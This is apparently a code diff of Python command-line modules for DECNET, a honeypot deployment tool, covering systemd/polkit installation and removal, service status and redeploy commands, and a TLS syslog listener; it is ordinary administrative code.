rendered_bytes = rendered.encode("utf-8")
|
||||
if dst.exists() and not force:
|
||||
if hashlib.sha256(dst.read_bytes()).hexdigest() == hashlib.sha256(rendered_bytes).hexdigest():
|
||||
return f"skip: {dst} up to date"
|
||||
if dry_run:
|
||||
console.print(f" [dim]would render:[/] {src} -> {dst} (mode={oct(mode)})")
|
||||
return "ok"
|
||||
dst.parent.mkdir(parents=True, exist_ok=True)
|
||||
dst.write_bytes(rendered_bytes)
|
||||
try:
|
||||
os.chmod(dst, mode)
|
||||
os.chown(dst, 0, 0)
|
||||
except PermissionError:
|
||||
pass
|
||||
return "ok"
|
||||
|
||||
|
||||
def _resolve_venv_dir(install_dir: str, explicit: str | None) -> str:
|
||||
"""Pick the virtualenv systemd units should ExecStart out of.
|
||||
|
||||
Priority:
|
||||
1. ``--venv-dir`` flag (explicit; absolute path required).
|
||||
2. ``VIRTUAL_ENV`` env var, but only when it lives under
|
||||
``install_dir`` (refuse to bake /home/user/.venv into a system
|
||||
service — that directory is user-owned and may vanish).
|
||||
3. ``{install_dir}/venv`` — what ``enroll_bootstrap.sh`` creates
|
||||
on fresh agents; the production default.
|
||||
4. First hit from a short list of dev-box conventions under
|
||||
``install_dir``: ``.venv``, ``.311``, ``.312``, ``.313``.
|
||||
|
||||
Raises RuntimeError with an operator-friendly message if none of
|
||||
those resolve to a directory containing ``bin/decnet``. Failing loud
|
||||
at init time beats systemd spamming journalctl with
|
||||
'Failed at step EXEC spawning .../venv/bin/decnet: No such file or
|
||||
directory' on every auto-restart.
|
||||
"""
|
||||
install_path = Path(install_dir)
|
||||
|
||||
candidates: list[Path] = []
|
||||
if explicit:
|
||||
if not explicit.startswith("/"):
|
||||
raise RuntimeError(
|
||||
f"--venv-dir must be an absolute path, got {explicit!r}"
|
||||
)
|
||||
candidates.append(Path(explicit))
|
||||
else:
|
||||
virtual_env = os.environ.get("VIRTUAL_ENV")
|
||||
if virtual_env:
|
||||
ve_path = Path(virtual_env)
|
||||
try:
|
||||
ve_path.relative_to(install_path)
|
||||
candidates.append(ve_path)
|
||||
except ValueError:
|
||||
# VIRTUAL_ENV lives outside install_dir — don't bake a
|
||||
# user-home venv into a root-owned systemd unit.
|
||||
pass
|
||||
candidates.append(install_path / "venv")
|
||||
for name in (".venv", ".311", ".312", ".313"):
|
||||
candidates.append(install_path / name)
|
||||
|
||||
for cand in candidates:
|
||||
if (cand / "bin" / "decnet").is_file():
|
||||
return str(cand)
|
||||
|
||||
searched = ", ".join(str(c) for c in candidates)
|
||||
raise RuntimeError(
|
||||
"Could not find a DECNET venv. Create one first (e.g. "
|
||||
f"`python -m venv {install_path}/venv && "
|
||||
f"{install_path}/venv/bin/pip install -e {install_path}[dev]`) "
|
||||
"or pass --venv-dir. Searched: " + searched
|
||||
)
|
||||
|
||||
|
||||
def _install_units(
|
||||
deploy: Path,
|
||||
systemd_dir: Path,
|
||||
*,
|
||||
install_dir: str,
|
||||
venv_dir: str,
|
||||
user: str,
|
||||
group: str,
|
||||
force: bool,
|
||||
dry_run: bool,
|
||||
) -> str:
|
||||
"""Render decnet-*.service.j2 → systemd_dir/decnet-*.service, and copy
|
||||
the static decnet.target (no templating needed — it has no install
|
||||
path references)."""
|
||||
context = {
|
||||
"install_dir": install_dir,
|
||||
"venv_dir": venv_dir,
|
||||
"user": user,
|
||||
"group": group,
|
||||
}
|
||||
templates = sorted(deploy.glob("decnet-*.service.j2"))
|
||||
static = [deploy / "decnet.target"]
|
||||
|
||||
touched = 0
|
||||
for src in templates:
|
||||
rendered = _render_template(src, context)
|
||||
# decnet-api.service.j2 → decnet-api.service
|
||||
dst_name = src.name[: -len(".j2")]
|
||||
result = _write_rendered_if_changed(
|
||||
src, systemd_dir / dst_name, rendered,
|
||||
mode=0o644, force=force, dry_run=dry_run,
|
||||
)
|
||||
if not result.startswith("skip:"):
|
||||
touched += 1
|
||||
for src in static:
|
||||
result = _copy_if_changed(
|
||||
src, systemd_dir / src.name,
|
||||
mode=0o644, force=force, dry_run=dry_run,
|
||||
)
|
||||
if not result.startswith("skip:"):
|
||||
touched += 1
|
||||
total = len(templates) + len(static)
|
||||
if touched == 0:
|
||||
return f"skip: {total} unit files up to date"
|
||||
return f"ok ({touched}/{total} installed)"
|
||||
|
||||
|
||||
def _install_polkit(
|
||||
deploy: Path, rules_dir: Path, *, group: str, force: bool, dry_run: bool
|
||||
) -> str:
|
||||
"""Render the group-scoped polkit rule to /etc/polkit-1/rules.d/.
|
||||
|
||||
The rule has to reference the same POSIX group passed via --group —
|
||||
otherwise the API (running as that user) can't
|
||||
systemctl start/stop decnet-*.service without an interactive auth
|
||||
prompt that never gets answered in a daemon context.
|
||||
"""
|
||||
src = deploy / "polkit" / "50-decnet-workers.rules.j2"
|
||||
if not src.is_file():
|
||||
raise RuntimeError(f"missing polkit rule template at {src}")
|
||||
rendered = _render_template(src, {"group": group})
|
||||
# 50-decnet-workers.rules.j2 → 50-decnet-workers.rules
|
||||
dst_name = src.name[: -len(".j2")]
|
||||
return _write_rendered_if_changed(
|
||||
src, rules_dir / dst_name, rendered,
|
||||
mode=0o644, force=force, dry_run=dry_run,
|
||||
)
|
||||
|
||||
|
||||
def _run_allow_fail(argv: List[str], *, dry_run: bool) -> str:
|
||||
"""Like ``_run`` but tolerates non-zero exits (stop/disable on an
|
||||
already-absent unit is fine during deinit)."""
|
||||
if dry_run:
|
||||
console.print(f" [dim]would run (allow fail):[/] {' '.join(argv)}")
|
||||
return "ok"
|
||||
log.info("init: exec (allow fail) %s", argv)
|
||||
result = subprocess.run(argv, check=False) # nosec B603
|
||||
if result.returncode != 0:
|
||||
return f"skip: rc={result.returncode} (already absent)"
|
||||
return "ok"
|
||||
|
||||
|
||||
def _remove_file(path: Path, *, dry_run: bool) -> str:
|
||||
if not path.exists() and not path.is_symlink():
|
||||
return f"skip: {path} already absent"
|
||||
if dry_run:
|
||||
console.print(f" [dim]would remove:[/] {path}")
|
||||
return "ok"
|
||||
path.unlink()
|
||||
return "ok"
|
||||
|
||||
|
||||
def _uninstall_units(systemd_dir: Path, *, dry_run: bool) -> str:
|
||||
removed = 0
|
||||
present = sorted(systemd_dir.glob("decnet-*.service"))
|
||||
target = systemd_dir / "decnet.target"
|
||||
if target.exists():
|
||||
present.append(target)
|
||||
for path in present:
|
||||
if dry_run:
|
||||
console.print(f" [dim]would remove:[/] {path}")
|
||||
removed += 1
|
||||
continue
|
||||
path.unlink()
|
||||
removed += 1
|
||||
if removed == 0:
|
||||
return "skip: no decnet unit files present"
|
||||
return f"ok ({removed} removed)"
|
||||
|
||||
|
||||
def _remove_user(user: str, *, dry_run: bool) -> str:
|
||||
try:
|
||||
pwd.getpwnam(user)
|
||||
except KeyError:
|
||||
return f"skip: user {user} already absent"
|
||||
# userdel returns non-zero if the user still owns running
|
||||
# processes; that's the operator's problem to sort out, not ours.
|
||||
return _run_allow_fail(["userdel", user], dry_run=dry_run)
|
||||
|
||||
|
||||
def _remove_group(group: str, *, dry_run: bool) -> str:
|
||||
try:
|
||||
grp.getgrnam(group)
|
||||
except KeyError:
|
||||
return f"skip: group {group} already absent"
|
||||
return _run_allow_fail(["groupdel", group], dry_run=dry_run)
|
||||
|
||||
|
||||
def _remove_dir_if_present(
|
||||
path: Path, *, dry_run: bool, recursive: bool = False
|
||||
) -> str:
|
||||
if not path.exists():
|
||||
return f"skip: {path} already absent"
|
||||
if dry_run:
|
||||
verb = "would rm -rf" if recursive else "would rmdir"
|
||||
console.print(f" [dim]{verb}:[/] {path}")
|
||||
return "ok"
|
||||
if recursive:
|
||||
shutil.rmtree(path, ignore_errors=True)
|
||||
else:
|
||||
try:
|
||||
path.rmdir()
|
||||
except OSError as exc:
|
||||
return f"skip: {path} not empty ({exc.strerror})"
|
||||
return "ok"
|
||||
|
||||
|
||||
def _install_tmpfiles(
|
||||
deploy: Path, tmpfiles_dir: Path, *, force: bool, dry_run: bool
|
||||
) -> str:
|
||||
src = deploy / "tmpfiles.d" / "decnet.conf"
|
||||
if not src.is_file():
|
||||
raise RuntimeError(f"missing tmpfiles.d entry at {src}")
|
||||
result = _copy_if_changed(
|
||||
src, tmpfiles_dir / src.name,
|
||||
mode=0o644, force=force, dry_run=dry_run,
|
||||
)
|
||||
# Apply immediately so /run/decnet exists before daemon-reload.
|
||||
_run(["systemd-tmpfiles", "--create", str(tmpfiles_dir / src.name)], dry_run=dry_run)
|
||||
return result
|
||||
|
||||
|
||||
def _install_logrotate(
|
||||
deploy: Path, logrotate_dir: Path, *, force: bool, dry_run: bool
|
||||
) -> str:
|
||||
"""Drop the logrotate config into ``/etc/logrotate.d/decnet``.
|
||||
|
||||
The ingester / forwarder hold the log files open via Python, so the
|
||||
config uses ``copytruncate`` rather than rename+create. Without this
|
||||
rule, /var/log/decnet/ grows without bound and a single noisy day of
|
||||
attacker traffic fills the disk on a small VPS. Best-effort: a host
|
||||
without logrotate installed (rare on systemd distros) still boots
|
||||
fine — the operator just needs to wire their own rotation.
|
||||
"""
|
||||
src = deploy / "logrotate.d" / "decnet"
|
||||
if not src.is_file():
|
||||
raise RuntimeError(f"missing logrotate config at {src}")
|
||||
return _copy_if_changed(
|
||||
src, logrotate_dir / src.name,
|
||||
mode=0o644, force=force, dry_run=dry_run,
|
||||
)
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="init")
|
||||
def init_cmd(
|
||||
dry_run: bool = typer.Option(
|
||||
False, "--dry-run",
|
||||
help="Print every action; make no changes.",
|
||||
),
|
||||
no_start: bool = typer.Option(
|
||||
False, "--no-start",
|
||||
help="Install everything but don't `systemctl enable --now decnet.target`.",
|
||||
),
|
||||
force: bool = typer.Option(
|
||||
False, "--force",
|
||||
help="Overwrite unit / polkit / tmpfiles entries even if identical.",
|
||||
),
|
||||
deinit: bool = typer.Option(
|
||||
False, "--deinit",
|
||||
help="Undo a previous init: stop + disable decnet.target, remove "
|
||||
"unit files, polkit rule, tmpfiles.d entry, /etc/decnet. "
|
||||
"Preserves /var/lib/decnet, /var/log/decnet, and the "
|
||||
"service user/group — pass --purge to remove those too.",
|
||||
),
|
||||
purge: bool = typer.Option(
|
||||
False, "--purge",
|
||||
help="With --deinit, also wipe /var/lib/decnet, "
|
||||
"/var/log/decnet, AND the service user/group. "
|
||||
"Destructive — operator data is gone, and if --user "
|
||||
"points at your own login account, that account goes "
|
||||
"with it. Only use when the user/group was created by "
|
||||
"`decnet init` in the first place.",
|
||||
),
|
||||
user: str = typer.Option(
|
||||
"decnet", "--user",
|
||||
help="System user to own DECNET processes.",
|
||||
),
|
||||
group: str = typer.Option(
|
||||
"decnet", "--group",
|
||||
help="Primary group of the DECNET user.",
|
||||
),
|
||||
install_dir: str = typer.Option(
|
||||
"/opt/decnet", "--install-dir",
|
||||
help="Absolute path where DECNET is installed. Default "
|
||||
"/opt/decnet; distros that reserve /opt can point this "
|
||||
"at /srv/decnet, /usr/local/decnet, etc. Gets rendered "
|
||||
"into every systemd unit via Jinja2 and used as the "
|
||||
"decnet user's home directory.",
|
||||
),
|
||||
venv_dir: Optional[str] = typer.Option(
|
||||
None, "--venv-dir",
|
||||
help="Absolute path to the Python venv systemd should "
|
||||
"ExecStart from. If omitted, auto-detected in order: "
|
||||
"$VIRTUAL_ENV (if under --install-dir), "
|
||||
"{install-dir}/venv, then {install-dir}/{.venv,.311,"
|
||||
".312,.313}. Init aborts if none exists.",
|
||||
),
|
||||
prefix: str = typer.Option(
|
||||
"", "--prefix", hidden=True,
|
||||
help="Filesystem prefix for tests (e.g. tmp_path). Empty = real root.",
|
||||
),
|
||||
) -> None:
|
||||
"""One-shot bootstrap of a DECNET master host.
|
||||
|
||||
Creates the `decnet` user/group, installs systemd units,
|
||||
polkit rules, tmpfiles.d entries, seeds directories and
|
||||
drops a placeholder config, then starts decnet.target.
|
||||
"""
|
||||
_require_master_mode("init")
|
||||
|
||||
if purge and not deinit:
|
||||
console.print("[red]--purge only applies with --deinit[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
# Root check — skip when --prefix is set (tests don't run as root).
|
||||
if not prefix and os.geteuid() != 0:
|
||||
verb = "deinit" if deinit else "init"
|
||||
console.print(f"[red]decnet {verb}: must run as root (use sudo)[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
if not install_dir.startswith("/"):
|
||||
console.print(
|
||||
f"[red]decnet init: --install-dir must be absolute, got {install_dir!r}[/]"
|
||||
)
|
||||
raise typer.Exit(1)
|
||||
# Strip leading slash so pfx-joining works under --prefix test mode
|
||||
# (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
|
||||
_install_rel = install_dir.lstrip("/")
|
||||
|
||||
required_tools = ("systemctl",) if deinit else (
|
||||
"systemctl", "useradd", "groupadd", "systemd-tmpfiles",
|
||||
)
|
||||
if deinit:
|
||||
required_tools = required_tools + ("userdel", "groupdel")
|
||||
for tool in required_tools:
|
||||
if shutil.which(tool) is None and not dry_run:
|
||||
verb = "deinit" if deinit else "init"
|
||||
console.print(f"[red]decnet {verb}: {tool!r} is required on PATH[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
pfx = Path(prefix) if prefix else Path("/")
|
||||
systemd_dir = pfx / "etc/systemd/system"
|
||||
polkit_dir = pfx / "etc/polkit-1/rules.d"
|
||||
tmpfiles_dir = pfx / "etc/tmpfiles.d"
|
||||
logrotate_dir = pfx / "etc/logrotate.d"
|
||||
etc_decnet = pfx / "etc/decnet"
|
||||
|
||||
if deinit:
|
||||
console.print(
|
||||
f"[bold cyan]DECNET deinit[/] "
|
||||
f"(dry_run={dry_run}, purge={purge})"
|
||||
)
|
||||
_step(
|
||||
"systemctl stop + disable decnet.target",
|
||||
lambda: _run_allow_fail(
|
||||
["systemctl", "disable", "--now", "decnet.target"],
|
||||
dry_run=dry_run,
|
||||
),
|
||||
)
|
||||
_step(
|
||||
"remove systemd unit files",
|
||||
lambda: _uninstall_units(systemd_dir, dry_run=dry_run),
|
||||
)
|
||||
_step(
|
||||
"remove polkit rule",
|
||||
lambda: _remove_file(
|
||||
polkit_dir / "50-decnet-workers.rules",
|
||||
dry_run=dry_run,
|
||||
),
|
||||
)
|
||||
_step(
|
||||
"remove tmpfiles.d entry",
|
||||
lambda: _remove_file(
|
||||
tmpfiles_dir / "decnet.conf",
|
||||
dry_run=dry_run,
|
||||
),
|
||||
)
|
||||
_step(
|
||||
"remove logrotate config",
|
||||
lambda: _remove_file(
|
||||
logrotate_dir / "decnet",
|
||||
dry_run=dry_run,
|
||||
),
|
||||
)
|
||||
_step(
|
||||
"systemctl daemon-reload",
|
||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
|
||||
)
|
||||
_step(
|
||||
f"remove {etc_decnet / 'decnet.ini'}",
|
||||
lambda: _remove_file(etc_decnet / "decnet.ini", dry_run=dry_run),
|
||||
)
|
||||
# Legacy name from pre-domain-sections placeholder era.
|
||||
# Harmless if absent (the _remove_file step logs skip).
|
||||
_step(
|
||||
f"remove legacy {etc_decnet / 'config.ini'}",
|
||||
lambda: _remove_file(etc_decnet / "config.ini", dry_run=dry_run),
|
||||
)
|
||||
_step(
|
||||
f"remove {etc_decnet}",
|
||||
lambda: _remove_dir_if_present(etc_decnet, dry_run=dry_run),
|
||||
)
|
||||
_step(
|
||||
f"remove {pfx / 'run/decnet'}",
|
||||
lambda: _remove_dir_if_present(
|
||||
pfx / "run/decnet", dry_run=dry_run,
|
||||
),
|
||||
)
|
||||
_step(
|
||||
f"remove {pfx / _install_rel}",
|
||||
lambda: _remove_dir_if_present(
|
||||
pfx / _install_rel, dry_run=dry_run,
|
||||
),
|
||||
)
|
||||
if purge:
|
||||
_step(
|
||||
f"purge {pfx / 'var/lib/decnet'}",
|
||||
lambda: _remove_dir_if_present(
|
||||
pfx / "var/lib/decnet",
|
||||
dry_run=dry_run, recursive=True,
|
||||
),
|
||||
)
|
||||
_step(
|
||||
f"purge {pfx / 'var/log/decnet'}",
|
||||
lambda: _remove_dir_if_present(
|
||||
pfx / "var/log/decnet",
|
||||
dry_run=dry_run, recursive=True,
|
||||
),
|
||||
)
|
||||
else:
|
||||
console.print(
|
||||
f"[dim]preserved {pfx / 'var/lib/decnet'} and "
|
||||
f"{pfx / 'var/log/decnet'} (operator data); "
|
||||
"re-run with --purge to remove.[/]"
|
||||
)
|
||||
# User / group removal is also gated on --purge. In dev the
|
||||
# operator may have passed their own login user via
|
||||
# `--user $USER` to avoid ownership churn; an unconditional
|
||||
# `userdel anti` during deinit would nuke their account.
|
||||
if purge:
|
||||
_step(
|
||||
f"remove user {user!r}",
|
||||
lambda: _remove_user(user, dry_run=dry_run),
|
||||
)
|
||||
_step(
|
||||
f"remove group {group!r}",
|
||||
lambda: _remove_group(group, dry_run=dry_run),
|
||||
)
|
||||
else:
|
||||
console.print(
|
||||
f"[dim]preserved user {user!r} and group {group!r}; "
|
||||
"re-run with --purge to remove (only do this if "
|
||||
"they were created by `decnet init`).[/]"
|
||||
)
|
||||
console.print("[bold green]DECNET deinit complete.[/]")
|
||||
return
|
||||
|
||||
try:
|
||||
deploy = _deploy_root()
|
||||
except RuntimeError as exc:
|
||||
console.print(f"[red]decnet init: {exc}[/]")
|
||||
raise typer.Exit(1) from exc
|
||||
|
||||
# Resolve venv BEFORE any file writes — fails loud if the
|
||||
# operator hasn't created one yet, instead of shipping broken
|
||||
# systemd units that journalctl spams forever. Skipped under
|
||||
# --prefix (test mode) because the test harness doesn't build a
|
||||
# real venv and the rendered string is asserted on directly.
|
||||
if prefix:
|
||||
resolved_venv = venv_dir or f"{install_dir}/venv"
|
||||
else:
|
||||
try:
|
||||
resolved_venv = _resolve_venv_dir(install_dir, venv_dir)
|
||||
except RuntimeError as exc:
|
||||
console.print(f"[red]decnet init: {exc}[/]")
|
||||
raise typer.Exit(1) from exc
|
||||
console.print(f"[dim]using venv: {resolved_venv}[/]")
|
||||
|
||||
dirs = [
|
||||
(pfx / _install_rel, 0o755, user, group),
|
||||
(pfx / "var/lib/decnet", 0o750, user, group),
|
||||
(pfx / "var/lib/decnet/geoip", 0o755, user, group),
|
||||
(pfx / "var/log/decnet", 0o750, user, group),
|
||||
(etc_decnet, 0o755, "root", group),
|
||||
(pfx / "run/decnet", 0o755, "root", group),
|
||||
]
|
||||
|
||||
console.print(
|
||||
f"[bold cyan]DECNET init[/] "
|
||||
f"(dry_run={dry_run}, no_start={no_start}, force={force})"
|
||||
)
|
||||
|
||||
_step(
|
||||
f"ensure group {group!r}",
|
||||
lambda: _ensure_group(group, dry_run=dry_run),
|
||||
)
|
||||
_step(
|
||||
f"ensure user {user!r}",
|
||||
lambda: _ensure_user(user, group, install_dir, dry_run=dry_run),
|
||||
)
|
||||
for path, mode, d_owner, d_group in dirs:
|
||||
_step(
|
||||
f"ensure dir {path}",
|
||||
lambda p=path, m=mode, o=d_owner, g=d_group:
|
||||
_ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
|
||||
)
|
||||
_step(
|
||||
f"write {etc_decnet / 'decnet.ini'}",
|
||||
lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run),
|
||||
)
|
||||
_step(
|
||||
"install systemd units",
|
||||
lambda: _install_units(
|
||||
deploy, systemd_dir,
|
||||
install_dir=install_dir, venv_dir=resolved_venv,
|
||||
user=user, group=group,
|
||||
force=force, dry_run=dry_run,
|
||||
),
|
||||
)
|
||||
_step(
|
||||
"install polkit rule",
|
||||
lambda: _install_polkit(
|
||||
deploy, polkit_dir, group=group,
|
||||
force=force, dry_run=dry_run,
|
||||
),
|
||||
)
|
||||
_step(
|
||||
"install tmpfiles.d entry",
|
||||
lambda: _install_tmpfiles(
|
||||
deploy, tmpfiles_dir, force=force, dry_run=dry_run,
|
||||
),
|
||||
)
|
||||
_step(
|
||||
"install logrotate config",
|
||||
lambda: _install_logrotate(
|
||||
deploy, logrotate_dir, force=force, dry_run=dry_run,
|
||||
),
|
||||
)
|
||||
_step(
|
||||
"systemctl daemon-reload",
|
||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
|
||||
)
|
||||
|
||||
if no_start:
|
||||
console.print("[yellow]--no-start: skipping decnet.target start[/]")
|
||||
return
|
||||
|
||||
try:
|
||||
_step(
|
||||
"systemctl enable --now decnet.target",
|
||||
lambda: (
|
||||
_run(
|
||||
["systemctl", "enable", "--now", "decnet.target"],
|
||||
dry_run=dry_run,
|
||||
),
|
||||
"ok",
|
||||
)[1],
|
||||
)
|
||||
except subprocess.CalledProcessError as exc:
|
||||
console.print(
|
||||
f"[red]decnet.target failed to start (rc={exc.returncode}); "
|
||||
"inspect `systemctl status decnet.target` and individual "
|
||||
"`decnet-*.service` units.[/]"
|
||||
)
|
||||
raise typer.Exit(1) from exc
|
||||
|
||||
console.print("[bold green]DECNET init complete.[/] "
|
||||
"Check `decnet status` or the Workers panel.")
|
||||
sys.stdout.flush()
|
||||
@@ -1,52 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
from rich.table import Table
|
||||
|
||||
from decnet.archetypes import all_archetypes
|
||||
from decnet.distros import all_distros
|
||||
from decnet.services.registry import all_services
|
||||
|
||||
from .utils import console
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="services")
|
||||
def list_services() -> None:
|
||||
"""List all registered honeypot service plugins."""
|
||||
svcs = all_services()
|
||||
table = Table(title="Available Services", show_lines=True)
|
||||
table.add_column("Name", style="bold cyan")
|
||||
table.add_column("Ports")
|
||||
table.add_column("Image")
|
||||
for name, svc in sorted(svcs.items()):
|
||||
table.add_row(name, ", ".join(str(p) for p in svc.ports), svc.default_image)
|
||||
console.print(table)
|
||||
|
||||
@app.command(name="distros")
|
||||
def list_distros() -> None:
|
||||
"""List all available OS distro profiles for deckies."""
|
||||
table = Table(title="Available Distro Profiles", show_lines=True)
|
||||
table.add_column("Slug", style="bold cyan")
|
||||
table.add_column("Display Name")
|
||||
table.add_column("Docker Image", style="dim")
|
||||
for slug, profile in sorted(all_distros().items()):
|
||||
table.add_row(slug, profile.display_name, profile.image)
|
||||
console.print(table)
|
||||
|
||||
@app.command(name="archetypes")
|
||||
def list_archetypes() -> None:
|
||||
"""List all machine archetype profiles."""
|
||||
table = Table(title="Machine Archetypes", show_lines=True)
|
||||
table.add_column("Slug", style="bold cyan")
|
||||
table.add_column("Display Name")
|
||||
table.add_column("Default Services", style="green")
|
||||
table.add_column("Description", style="dim")
|
||||
for slug, arch in sorted(all_archetypes().items()):
|
||||
table.add_row(
|
||||
slug,
|
||||
arch.display_name,
|
||||
", ".join(arch.services),
|
||||
arch.description,
|
||||
)
|
||||
console.print(table)
|
||||
@@ -1,147 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import subprocess # nosec B404
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.table import Table
|
||||
|
||||
from decnet.env import DECNET_INGEST_LOG_FILE
|
||||
|
||||
from . import utils as _utils
|
||||
from .gating import _agent_mode_active, _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
|
||||
def redeploy(
|
||||
log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path to the DECNET log file"),
|
||||
) -> None:
|
||||
"""Check running DECNET services and relaunch any that are down."""
|
||||
log.info("redeploy: checking services")
|
||||
registry = _utils._service_registry(str(log_file))
|
||||
|
||||
table = Table(title="DECNET Services", show_lines=True)
|
||||
table.add_column("Service", style="bold cyan")
|
||||
table.add_column("Status")
|
||||
table.add_column("PID", style="dim")
|
||||
table.add_column("Action")
|
||||
|
||||
relaunched = 0
|
||||
for name, match_fn, launch_args in registry:
|
||||
pid = _utils._is_running(match_fn)
|
||||
if pid is not None:
|
||||
table.add_row(name, "[green]UP[/]", str(pid), "—")
|
||||
else:
|
||||
try:
|
||||
subprocess.Popen( # nosec B603
|
||||
launch_args,
|
||||
stdin=subprocess.DEVNULL,
|
||||
stdout=subprocess.DEVNULL,
|
||||
stderr=subprocess.STDOUT,
|
||||
start_new_session=True,
|
||||
)
|
||||
table.add_row(name, "[red]DOWN[/]", "—", "[green]relaunched[/]")
|
||||
relaunched += 1
|
||||
except (FileNotFoundError, subprocess.SubprocessError) as exc:
|
||||
table.add_row(name, "[red]DOWN[/]", "—", f"[red]failed: {exc}[/]")
|
||||
|
||||
console.print(table)
|
||||
if relaunched:
|
||||
console.print(f"[green]{relaunched} service(s) relaunched.[/]")
|
||||
else:
|
||||
console.print("[green]All services running.[/]")
|
||||
|
||||
@app.command()
|
||||
def status() -> None:
|
||||
"""Show running deckies and the state of every ``decnet-*`` unit.
|
||||
|
||||
Prefers systemd (``systemctl list-units 'decnet-*.service'``) so
|
||||
agents, masters and mixed hosts all get one consistent view of
|
||||
what's installed, loaded, and active. Falls back to the psutil
|
||||
cmdline registry on boxes without systemd (dev laptops, CI
|
||||
containers, non-systemd init) so `decnet status` is still useful
|
||||
there.
|
||||
"""
|
||||
log.info("status command invoked")
|
||||
from decnet.engine import status as _status
|
||||
_status()
|
||||
|
||||
units = _utils._systemd_units()
|
||||
if units is not None:
|
||||
_render_systemd_units(units)
|
||||
else:
|
||||
_render_psutil_fallback()
|
||||
|
||||
def _render_systemd_units(units: list[dict]) -> None:
|
||||
svc_table = Table(title="DECNET Services (systemd)", show_lines=True)
|
||||
svc_table.add_column("Unit", style="bold cyan")
|
||||
svc_table.add_column("Load")
|
||||
svc_table.add_column("Active")
|
||||
svc_table.add_column("Sub")
|
||||
svc_table.add_column("Description", style="dim")
|
||||
|
||||
if not units:
|
||||
console.print(
|
||||
"[yellow]No decnet-* systemd units loaded. "
|
||||
"Run `sudo decnet init` to install them.[/]"
|
||||
)
|
||||
return
|
||||
|
||||
def _active_style(active: str) -> str:
|
||||
if active == "active":
|
||||
return "[green]active[/]"
|
||||
if active == "failed":
|
||||
return "[red]failed[/]"
|
||||
return f"[yellow]{active}[/]"
|
||||
|
||||
for u in sorted(units, key=lambda x: x.get("unit", "")):
|
||||
svc_table.add_row(
|
||||
u.get("unit", ""),
|
||||
u.get("load", ""),
|
||||
_active_style(u.get("active", "")),
|
||||
u.get("sub", ""),
|
||||
u.get("description", ""),
|
||||
)
|
||||
console.print(svc_table)
|
||||
|
||||
def _render_psutil_fallback() -> None:
|
||||
registry = _utils._service_registry(str(DECNET_INGEST_LOG_FILE))
|
||||
if _agent_mode_active():
|
||||
registry = [r for r in registry if r[0] not in {"Mutator", "Profiler", "API"}]
|
||||
svc_table = Table(
|
||||
title="DECNET Services (psutil fallback — systemd unavailable)",
|
||||
show_lines=True,
|
||||
)
|
||||
svc_table.add_column("Service", style="bold cyan")
|
||||
svc_table.add_column("Status")
|
||||
svc_table.add_column("PID", style="dim")
|
||||
|
||||
for name, match_fn, _launch_args in registry:
|
||||
pid = _utils._is_running(match_fn)
|
||||
if pid is not None:
|
||||
svc_table.add_row(name, "[green]UP[/]", str(pid))
|
||||
else:
|
||||
svc_table.add_row(name, "[red]DOWN[/]", "—")
|
||||
|
||||
console.print(svc_table)
|
||||
|
||||
@app.command()
|
||||
def teardown(
|
||||
all_: bool = typer.Option(False, "--all", help="Tear down all deckies and remove network"),
|
||||
id_: Optional[str] = typer.Option(None, "--id", help="Tear down a specific decky by name"),
|
||||
) -> None:
|
||||
"""Stop and remove deckies."""
|
||||
_require_master_mode("teardown")
|
||||
if not all_ and not id_:
|
||||
console.print("[red]Specify --all or --id <name>.[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
log.info("teardown command invoked all=%s id=%s", all_, id_)
|
||||
from decnet.engine import teardown as _teardown
|
||||
_teardown(decky_id=id_)
|
||||
log.info("teardown complete all=%s id=%s", all_, id_)
|
||||
|
||||
if all_:
|
||||
_utils._kill_all_services()
|
||||
@@ -1,57 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import pathlib
|
||||
import signal
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
|
||||
def listener(
|
||||
bind_host: str = typer.Option("0.0.0.0", "--host", help="Bind address for the master syslog-TLS listener"), # nosec B104
|
||||
bind_port: int = typer.Option(6514, "--port", help="Listener TCP port (RFC 5425 default 6514)"),
|
||||
log_path: Optional[str] = typer.Option(None, "--log-path", help="RFC 5424 forensic sink (default: ./master.log)"),
|
||||
json_path: Optional[str] = typer.Option(None, "--json-path", help="Parsed-JSON ingest sink (default: ./master.json)"),
|
||||
ca_dir: Optional[str] = typer.Option(None, "--ca-dir", help="DECNET CA dir (default: ~/.decnet/ca)"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
) -> None:
|
||||
"""Run the master-side syslog-over-TLS listener (RFC 5425, mTLS)."""
|
||||
from decnet.swarm import pki
|
||||
from decnet.swarm.log_listener import ListenerConfig, run_listener
|
||||
|
||||
resolved_ca_dir = pathlib.Path(ca_dir) if ca_dir else pki.DEFAULT_CA_DIR
|
||||
resolved_log = pathlib.Path(log_path) if log_path else pathlib.Path("master.log")
|
||||
resolved_json = pathlib.Path(json_path) if json_path else pathlib.Path("master.json")
|
||||
|
||||
cfg = ListenerConfig(
|
||||
log_path=resolved_log, json_path=resolved_json,
|
||||
bind_host=bind_host, bind_port=bind_port, ca_dir=resolved_ca_dir,
|
||||
)
|
||||
|
||||
if daemon:
|
||||
log.info("listener daemonizing host=%s port=%d", bind_host, bind_port)
|
||||
_utils._daemonize()
|
||||
|
||||
